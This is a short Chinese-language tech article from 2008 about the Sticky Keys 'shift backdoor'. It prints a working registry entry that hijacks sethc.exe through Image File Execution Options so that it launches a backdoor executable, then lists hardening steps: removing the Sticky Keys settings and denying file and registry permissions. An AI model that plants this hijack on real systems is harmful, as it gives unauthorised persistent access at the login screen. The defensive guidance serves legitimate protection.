首页 电脑 电脑学堂 查看内容

sethc.exe新的镜像劫持技术和安全防御!(shift后门)

2008-10-10 09:54 896 0

摘要: 今天群里朋友发我个shift后门,带镜像劫持的,可以按5下shift,然后输入密码.5下shift → 不关闭 → 然后鼠标右键点出来的那个框框右下角...前提是先运行个p处理或reg,这个方法比较牛...
关键词: Windows exe shift 安全 CurrentVersion 注册表 sethc Execution Microsoft winshell

今天群里朋友发我个shift后门,带镜像劫持的,可以按5下shift,然后输入密码.5下shift → 不关闭 → 然后鼠标右键点出来的那个框框右下角...前提是先运行个p处理或reg,这个方法比较牛X..注册表如下 Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]"Debugger"="C:\\www.winshell.cn.exe" 这个exe存的路径是:c:\\www.winshell.cn.exe -----------------------------------------------------以下是安全设置---------------------------知道上边原理:就可以设置安全了....在服务器里按5下shift,出设置把所有的对号去掉.删除所有文件安全设置下用户,加everyone设置全部拒绝C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache的sethc.exe修改注册表权限,同上.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部